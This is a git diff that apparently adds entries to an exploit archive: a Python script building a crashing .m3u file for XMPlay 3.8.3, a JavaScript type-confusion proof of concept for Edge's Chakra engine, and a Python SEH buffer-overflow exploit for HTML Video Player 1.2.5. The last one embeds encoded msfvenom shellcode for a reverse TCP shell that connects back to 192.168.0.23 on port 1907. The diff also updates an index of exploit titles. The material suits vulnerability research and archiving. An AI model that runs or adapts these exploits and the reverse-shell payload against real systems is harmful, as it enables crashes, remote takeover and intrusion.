diff --git a/exploits/windows/dos/45887.py b/exploits/windows/dos/45887.py
new file mode 100755
index 000000000..1e4b64e3b
--- /dev/null
+++ b/exploits/windows/dos/45887.py
@@ -0,0 +1,44 @@
+# Exploit Title: XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)
+# Date: 2018-11-18
+# Exploit Author: s7acktrac3
+# Vendor Homepage: https://www.xmplay.com/
+# Software Link: https://support.xmplay.com/files_view.php?file_id=676
+# Version: 3.8.3 (latest)
+# Tested on: Windows XP/7/8
+# CVE : N/A
+#
+# Lauch XMPlay and either drag xmplay.m3u into the XMPlay window or
+# File Menu-> select winamp.m3u and Crash!
+# -*- coding: utf-8 -*-
+#
+# Note: Successfully can overwrite the SEH chain & control the handler and nSEH
+# but the address get mangled & unreconizable, for this reason could not turn into
+# code execution.
+
+import struct
+from struct import pack
+
+file_data = "#EXTM3U\n\r"
+file_data += "#EXTINF:200,Sleep Away\n\r"
+file_data += "http://test."
+
+max_size = 3000 - 1
+nseh_offset = 656
+
+seh_overwrite = pack("<L", 0x00402450)
+
+payload = "A" * nseh_offset	# padding for nseh
+payload += "BBBB"				# nseh
+payload += seh_overwrite		# seh
+
+#padding for rest of payload - pipe "|" is needed somehow to force crash 
+payload += "D" *(max_size - len(payload)) + "|"
+print "[+] Creating .m3u file with payload size: "+ str(len(payload))
+
+exploit = file_data + payload
+
+file = open('xmplay.m3u','w');
+file.write(exploit);
+file.close();
+ 
+print "[+] Done creating the file"
\ No newline at end of file
diff --git a/exploits/windows/dos/45889.js b/exploits/windows/dos/45889.js
new file mode 100644
index 000000000..cffa9d684
--- /dev/null
+++ b/exploits/windows/dos/45889.js
@@ -0,0 +1,45 @@
+/*
+Since the patch for CVE-2018-8372, it checks all inputs to native arrays, and if any input equals to the MissingItem value which can cause type confusion, it starts the bailout process. But it doesn't check the "value" argument to OP_Memset. This can be exploited in the same way as for   issue 1581  .
+
+PoC:
+*/
+
+function memset(arr, value, n) {
+    for (let i = 0; i < n; i++) {
+        arr[i] = value;
+    }
+}
+
+function trigger(arr, buggy) {
+    let tmp = [1];
+
+    arr.length;
+
+    let res = tmp.concat(buggy);
+    arr[0] = 0x1234;
+    arr[1] = 0;
+}
+
+function main() {
+    let tmp = (new Array(100)).fill(1);
+    for (let i = 0; i < 500; i++) {
+        memset(tmp, 1, tmp.length);
+        trigger(tmp, [1]);
+    }
+
+    setTimeout(() => {
+        let buggy = [1];
+        let arr = [1, 2];
+
+        arr.getPrototypeOf = Object.prototype.valueOf;
+
+        buggy.__proto__ = new Proxy({}, arr);
+
+        memset(buggy, -524286, 1);
+        trigger(arr, buggy);
+
+        alert(arr);
+    }, 100);
+}
+
+main();
\ No newline at end of file
diff --git a/exploits/windows_x86/local/45888.py b/exploits/windows_x86/local/45888.py
new file mode 100755
index 000000000..4f0148493
--- /dev/null
+++ b/exploits/windows_x86/local/45888.py
@@ -0,0 +1,79 @@
+# Exploit Title: HTML Video Player 1.2.5 - Buffer-Overflow (SEH)
+# Author: Kağan Çapar
+# Discovery Date: 2018-11-16
+# Software Link: http://www.html5videoplayer.net/html5videoplayer-setup.exe
+# Vendor Homepage : http://www.html5videoplayer.net
+# Tested Version: 1.2.5
+# Tested on OS: Windows XP SP3 *ENG
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt" and copy content to clipboard 
+# Open software, click Help > Register and paste "Username" click "OK"
+# Finally, Connect victim machine on port your localport "1907"
+
+#!/usr/bin/python
+import struct
+
+#SEH chain of main thread, item 0
+#Address=0012EAF4
+#SE handler=41414141
+#=> next_handler below!
+#SEH chain of main thread, item 0
+#Address=0012EAF4
+#SE handler=336F4332 => 
+
+#7C901931   5E               POP ESI
+#7C901932   5B               POP EBX
+#7C901933   C3               RETN
+
+#Executable modules, item 14
+#Base=7C900000
+#Size=000B2000 (729088.)
+#Entry=7C912AFC ntdll.<ModuleEntryPoint>
+#Name=ntdll    (system)
+#File version=5.1.2600.6055 (xpsp_sp3_qfe.101
+#Path=C:\WINDOWS\system32\ntdll.dll
+
+file = open("exploit.txt", "w")
+buf = "\x43\x57\x44\x4F\x4E\x4B\x4E\x50\x48\x52\x4B\x45\x59\x41\x4b\x53" * 124
+buf+= "\xEB\x06\x90\x90" #6b jmp code
+buf+= struct.pack('<I', 0x7C901931)
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.23 LPORT=1907 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a"
+#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
+#x86/shikata_ga_nai succeeded with size 351 (iteration=0)
+#x86/shikata_ga_nai chosen with final size 351
+#Payload size: 351 bytes
+#Final size of py file: 1684 bytes
+
+buf += "\xbe\xab\xfd\x5f\x95\xda\xcb\xd9\x74\x24\xf4\x5f\x29"
+buf += "\xc9\xb1\x52\x83\xef\xfc\x31\x77\x0e\x03\xdc\xf3\xbd"
+buf += "\x60\xde\xe4\xc0\x8b\x1e\xf5\xa4\x02\xfb\xc4\xe4\x71"
+buf += "\x88\x77\xd5\xf2\xdc\x7b\x9e\x57\xf4\x08\xd2\x7f\xfb"
+buf += "\xb9\x59\xa6\x32\x39\xf1\x9a\x55\xb9\x08\xcf\xb5\x80"
+buf += "\xc2\x02\xb4\xc5\x3f\xee\xe4\x9e\x34\x5d\x18\xaa\x01"
+buf += "\x5e\x93\xe0\x84\xe6\x40\xb0\xa7\xc7\xd7\xca\xf1\xc7"
+buf += "\xd6\x1f\x8a\x41\xc0\x7c\xb7\x18\x7b\xb6\x43\x9b\xad"
+buf += "\x86\xac\x30\x90\x26\x5f\x48\xd5\x81\x80\x3f\x2f\xf2"
+buf += "\x3d\x38\xf4\x88\x99\xcd\xee\x2b\x69\x75\xca\xca\xbe"
+buf += "\xe0\x99\xc1\x0b\x66\xc5\xc5\x8a\xab\x7e\xf1\x07\x4a"
+buf += "\x50\x73\x53\x69\x74\xdf\x07\x10\x2d\x85\xe6\x2d\x2d"
+buf += "\x66\x56\x88\x26\x8b\x83\xa1\x65\xc4\x60\x88\x95\x14"
+buf += "\xef\x9b\xe6\x26\xb0\x37\x60\x0b\x39\x9e\x77\x6c\x10"
+buf += "\x66\xe7\x93\x9b\x97\x2e\x50\xcf\xc7\x58\x71\x70\x8c"
+buf += "\x98\x7e\xa5\x03\xc8\xd0\x16\xe4\xb8\x90\xc6\x8c\xd2"
+buf += "\x1e\x38\xac\xdd\xf4\x51\x47\x24\x9f\x9d\x30\x26\x48"
+buf += "\x76\x43\x26\x71\xf5\xca\xc0\x17\xe9\x9a\x5b\x80\x90"
+buf += "\x86\x17\x31\x5c\x1d\x52\x71\xd6\x92\xa3\x3c\x1f\xde"
+buf += "\xb7\xa9\xef\x95\xe5\x7c\xef\x03\x81\xe3\x62\xc8\x51"
+buf += "\x6d\x9f\x47\x06\x3a\x51\x9e\xc2\xd6\xc8\x08\xf0\x2a"
+buf += "\x8c\x73\xb0\xf0\x6d\x7d\x39\x74\xc9\x59\x29\x40\xd2"
+buf += "\xe5\x1d\x1c\x85\xb3\xcb\xda\x7f\x72\xa5\xb4\x2c\xdc"
+buf += "\x21\x40\x1f\xdf\x37\x4d\x4a\xa9\xd7\xfc\x23\xec\xe8"
+buf += "\x31\xa4\xf8\x91\x2f\x54\x06\x48\xf4\x74\xe5\x58\x01"
+buf += "\x1d\xb0\x09\xa8\x40\x43\xe4\xef\x7c\xc0\x0c\x90\x7a"
+buf += "\xd8\x65\x95\xc7\x5e\x96\xe7\x58\x0b\x98\x54\x58\x1e"
+buf += "\x90" * (4000 - len(buf))
+
+print len(buf)
+file.write(buf)
+file.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 274073ea0..e43fcb841 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6192,6 +6192,8 @@ id,file,description,date,author,type,platform,port
 45869,exploits/windows_x86-64/dos/45869.py,"Notepad3 1.0.2.350 - Denial of Service (PoC)",2018-11-15,"Ihsan Sencan",dos,windows_x86-64,
 45884,exploits/windows_x86-64/dos/45884.py,"Mumsoft Easy Software 2.0 - Denial of Service (PoC)",2018-11-16,"Ihsan Sencan",dos,windows_x86-64,
 45885,exploits/windows_x86-64/dos/45885.txt,"Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)",2018-11-16,"Ihsan Sencan",dos,windows_x86-64,
+45887,exploits/windows/dos/45887.py,"XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)",2018-11-19,s7acktrac3,dos,windows,
+45889,exploits/windows/dos/45889.js,"Microsoft Edge Chakra - OP_Memset Type Confusion",2018-11-19,"Google Security Research",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10110,6 +10112,7 @@ id,file,description,date,author,type,platform,port
 45866,exploits/multiple/local/45866.html,"Webkit (Safari) - Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
 45867,exploits/multiple/local/45867.txt,"Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
 45886,exploits/linux/local/45886.txt,"Linux - Broken uid/gid Mapping for Nested User Namespaces",2018-11-16,"Google Security Research",local,linux,
+45888,exploits/windows_x86/local/45888.py,"HTML Video Player 1.2.5 - Buffer-Overflow (SEH)",2018-11-19,"Kağan Çapar",local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139